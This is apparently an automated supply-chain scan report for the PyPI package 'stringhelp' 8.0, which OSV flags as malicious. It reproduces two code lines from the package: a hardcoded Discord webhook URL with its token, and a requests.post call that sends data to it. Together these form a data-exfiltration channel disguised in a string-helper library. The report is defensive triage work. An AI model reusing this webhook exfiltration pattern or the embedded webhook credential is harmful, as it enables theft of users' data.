stringhelp@8.0 INFO 2.8 Summary

Chaintrap · PyPI supply chain

PyPI package scan

Registry metadata, verified artifact, OSV for this release, requires_dist dependency OSV pass, line-level rules (pypi_malware_rules), optional pip-audit/Bandit — same report shell as npm-mal-scan.

Verdict: INFO
package: stringhelp
version: 8.0
artifact: stringhelp-8.0.tar.gz
sha256: 762c22579bd587d947824ec2aa9d6579a76a1546b1f88f70…
files scanned: 7
detection ruleset: pypi_malware_rules 2026-04-17
scanner build: pypi-mal-scan-2026-04-14

Executive summary

PyPI greenfield scan rated this release INFO (heuristic score 2.8 / 10). OSV reported 1 advisory ID(s); static analysis emitted 2 pattern hit(s).

Scanners prioritize signal over certainty: expect both false positives and blind spots. Combine OSV data with static findings and your own policy — this report does not replace manual review.

Heuristic score: 2.8 / 10 · Scanner: pypi-mal-scan-2026-04-14

Verdict: INFO
OSV IDs: 1
Static hits: 2

Verdict rationale

Heuristic score combines static rules, OSV hits for this exact version, and optional pip-audit / Bandit output. It is not a malware conviction.

Raw sum before 10.0 cap: 2.8 · Capped total: 2.8

Findings by severity: high: 1, low: 1

Score buckets:

  • Static pattern rules (line-level): 2.35 · 2 match(es); weights sum to this bucket before the global cap.
  • OSV advisories (exact name@version): 0.45 · 1 record(s); capped at 4.0 points.
  • pip-audit (optional): 0 vuln row(s); capped at 3.0; enable PYPI_PIP_AUDIT.
  • Bandit high/critical (optional): 0 finding(s); capped at 3.0; enable PYPI_BANDIT.

Ruleset: 2026-04-17 · Verdict thresholds (heuristic score out of 10):

  • BLOCK — >= 9.0
  • REVIEW — >= 7.0
  • WARN — >= 4.5
  • INFO — >= 1.5
  • PASS — < 1.5

Source & project links

Use Source Code / Homepage for manual review of the upstream repo. This scan does not clone those URLs.

No project URLs in PyPI metadata.

  • Links come from PyPI JSON metadata only; this scan does not clone or diff the upstream repository.
  • Static rules and optional Bandit run on the **published wheel/sdist** bytes from PyPI, which may omit files present only in VCS.

Publisher identity

Author email: none@example.com

Trove classifiers

  • License :: OSI Approved :: MIT License
  • Operating System :: OS Independent
  • Programming Language :: Python :: 3

Package overview

A small example package made to help you with strings

Scan coverage

Line-level rules ran over text-like files under the extracted artifact (max 400000 bytes per file).

  • Files scanned: 7
  • Skipped (over size): 0
  • Approx. lines: 70
  • Text bytes read: 2286

Files by suffix (top 24):

  • .py: 3
  • .txt: 3
  • .cfg: 1

1 known vulnerability (OSV)

OSV lookup: Checked

Chaintrap pairs static behavior signals above with OSV data for this exact version — cross-check CVEs and malware listings with install scripts, execution paths, and scanner findings.

Source: osv.dev — queried at scan time.

1 advisory ID(s) returned by OSV query.

MAL-2026-2854 · UNKNOWN · Published 2026-04-18T09:09:55Z

Malicious code in stringhelp (PyPI)

Malicious-package listing (OSV MAL-* namespace — e.g. OpenSSF malicious-packages). Treat as supply-chain malware signal; confirm with linked advisories and rotate credentials if this version was installed on sensitive hosts.

Direct dependencies (OSV)

Declared requires_dist strings from package metadata. Each dependency is resolved to the highest PyPI version matching the version specifier, then checked against OSV for that exact name@version. Does not affect the headline verdict score.

  • Each row uses the highest PyPI release that satisfies the declared version specifier.
  • Environment markers are not evaluated; resolution ignores ``python_version`` / platform constraints.
  • This is not a lockfile install graph — only direct ``requires_dist`` strings from package metadata.

No requires_dist entries in PyPI metadata for this release.

Static pattern findings

Detection library pypi_malware_rules (2026-04-17) — 75 line-level rules over .py and other text artifacts. Matches are triage signals, not proof of malice.

Matches by category: network (2) · Total hits: 2

discord_webhook_url (high)

Category: network

Discord webhook URLs are common exfil/C2 channels for stealers (RAT mutants, token theft).

Analyst note: Legitimate bots exist; correlate with other high-signal rules.

stringhelp-8.0/stringhelp/stringhelp.py:9

Snippet:
    self.url = 'https://discordapp.com/api/webhooks/746555804047507537/SErkxjuHm1FwqSER8ll7DQtmbbjXAtfMtGk88b3O21Ev_uhbxziZ2-5Qz-1nL4RUsMIO'

requests_http (low)

Category: network

Outbound HTTP via requests.

Analyst note: Check URLs (literal vs dynamic) and whether responses feed exec/load.

stringhelp-8.0/stringhelp/stringhelp.py:12

Snippet:
    requests.post(self.url, data={'content': item})

Analyst next steps

Recommended checks:

  • Treat findings as triage signals, not automatic malware verdicts.
  • Open the Source Code / Homepage links above and compare tagged releases to the artifact hash you scanned.
  • If MAL-* OSV IDs appear, review OpenSSF malicious-packages context and isolate affected hosts.
  • Pin dependencies with hashes in CI; prefer wheels from PyPI with digest verification.